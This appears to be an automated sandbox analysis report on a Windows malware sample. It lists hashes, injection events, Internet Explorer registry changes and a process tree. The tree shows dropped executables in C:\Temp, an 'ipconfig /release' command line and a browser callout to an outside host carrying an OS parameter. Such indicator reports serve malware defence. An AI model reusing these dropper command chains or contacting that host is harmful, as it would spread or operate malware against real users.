Analysis
-
max time kernel
150s -
max time network
192s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
03-12-2022 17:58
Static task
static1
Behavioral task
behavioral1
Sample
b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe
Resource
win10v2004-20221111-en
General
-
Target
b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe
-
Size
361KB
-
MD5
fd8d85539a43f9fa24539a11251b8028
-
SHA1
21606b28e4988875a2d51d8979ee130034d0a9da
-
SHA256
b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3
-
SHA512
9d4ab1e0c00156e49691228853474b876049c2966f78f02aabd0930a3fdc2b5043adc5420cf5fd373dbaea1de571c00e3853aa0869fb3a87f75efbcd79566ece
-
SSDEEP
6144:VflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:VflfAsiVGjSGecvX
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
pid Process 948 dxqmgcngdwsmfbvj.exe 1496 CreateProcess.exe 1328 rakrbiscis.exe 1404 CreateProcess.exe 1888 CreateProcess.exe -
Loads dropped DLL 5 IoCs
pid Process 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 1328 rakrbiscis.exe 948 dxqmgcngdwsmfbvj.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1840 ipconfig.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8FDC60B1-75BE-11ED-AD63-CED6325FB9F2} = "0" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 948 dxqmgcngdwsmfbvj.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe 1328 rakrbiscis.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 340 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 340 iexplore.exe 340 iexplore.exe 1592 IEXPLORE.EXE 1592 IEXPLORE.EXE 1592 IEXPLORE.EXE 1592 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1192 wrote to memory of 948 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 28 PID 1192 wrote to memory of 948 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 28 PID 1192 wrote to memory of 948 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 28 PID 1192 wrote to memory of 948 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 28 PID 1192 wrote to memory of 340 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 29 PID 1192 wrote to memory of 340 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 29 PID 1192 wrote to memory of 340 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 29 PID 1192 wrote to memory of 340 1192 b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe 29 PID 340 wrote to memory of 1592 340 iexplore.exe 31 PID 340 wrote to memory of 1592 340 iexplore.exe 31 PID 340 wrote to memory of 1592 340 iexplore.exe 31 PID 340 wrote to memory of 1592 340 iexplore.exe 31 PID 948 wrote to memory of 1496 948 dxqmgcngdwsmfbvj.exe 33 PID 948 wrote to memory of 1496 948 dxqmgcngdwsmfbvj.exe 33 PID 948 wrote to memory of 1496 948 dxqmgcngdwsmfbvj.exe 33 PID 948 wrote to memory of 1496 948 dxqmgcngdwsmfbvj.exe 33 PID 1328 wrote to memory of 1404 1328 rakrbiscis.exe 35 PID 1328 wrote to memory of 1404 1328 rakrbiscis.exe 35 PID 1328 wrote to memory of 1404 1328 rakrbiscis.exe 35 PID 1328 wrote to memory of 1404 1328 rakrbiscis.exe 35 PID 948 wrote to memory of 1888 948 dxqmgcngdwsmfbvj.exe 38 PID 948 wrote to memory of 1888 948 dxqmgcngdwsmfbvj.exe 38 PID 948 wrote to memory of 1888 948 dxqmgcngdwsmfbvj.exe 38 PID 948 wrote to memory of 1888 948 dxqmgcngdwsmfbvj.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe"C:\Users\Admin\AppData\Local\Temp\b55c0b5263ed79a740fd0cc67a921cf06c55c68cf39480b173086e5aba233dd3.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Temp\dxqmgcngdwsmfbvj.exeC:\Temp\dxqmgcngdwsmfbvj.exe run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:948 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\rakrbiscis.exe ups_run3⤵
- Executes dropped EXE
PID:1496 -
C:\Temp\rakrbiscis.exeC:\Temp\rakrbiscis.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:1404 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1840
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_rakrbiscis.exe ups_ins3⤵
- Executes dropped EXE
PID:1888
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1592
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
361KB
MD597fb51ef1982726fa3dd804ce069ba7b
SHA10aa34217345f52149cc810c5e3b4393858fc05b4
SHA25668345430dfdd06c6336e082ff8f5b3bd310660c46e77d20ae2ea292680c047e1
SHA51243c28b2109cd9ff393b2fc478c88a05bfb92e2184de9bb42d04598f761b3fec3994d32505e9c013f2b2f36072f31ca9bb9078520212a445105fa5ccd38e006ed
-
Filesize
361KB
MD597fb51ef1982726fa3dd804ce069ba7b
SHA10aa34217345f52149cc810c5e3b4393858fc05b4
SHA25668345430dfdd06c6336e082ff8f5b3bd310660c46e77d20ae2ea292680c047e1
SHA51243c28b2109cd9ff393b2fc478c88a05bfb92e2184de9bb42d04598f761b3fec3994d32505e9c013f2b2f36072f31ca9bb9078520212a445105fa5ccd38e006ed
-
Filesize
361KB
MD5295e4d25c0d2c3cbf63024e8ce3c8a8a
SHA182b40ea71ecc456c3b3bb284c648494b321bce98
SHA256fa82ba78fb1195008d75863a1b1fb55636dbbf07d8dbd0f7463d65c60abef5a6
SHA512012eb3e524d06e04cf6a8bc15aec61bc4164f436d65851fa121d48dabcdf360817150a880a403cdd69c73f9eb726c0a7d5cc017c272c2294f1caf52d35ab0e70
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
3KB
MD5dad379a9726ed5605481ede0c627da1b
SHA194f6fb848462ef76ffed47760459128f435fa602
SHA25641f759709c9c71a83cbb2a8afb5fbbe46c800f7a45100ea3ff8d0a94b12a9bae
SHA512ff5dafede547f85ceb0a866b93355403755e96dd8c2a83e953768defc2966e29081d4af27c6910b93da511fb274bdfb74008f0f177ccde2e0f85c34ad3c6ac7b
-
Filesize
361KB
MD597fb51ef1982726fa3dd804ce069ba7b
SHA10aa34217345f52149cc810c5e3b4393858fc05b4
SHA25668345430dfdd06c6336e082ff8f5b3bd310660c46e77d20ae2ea292680c047e1
SHA51243c28b2109cd9ff393b2fc478c88a05bfb92e2184de9bb42d04598f761b3fec3994d32505e9c013f2b2f36072f31ca9bb9078520212a445105fa5ccd38e006ed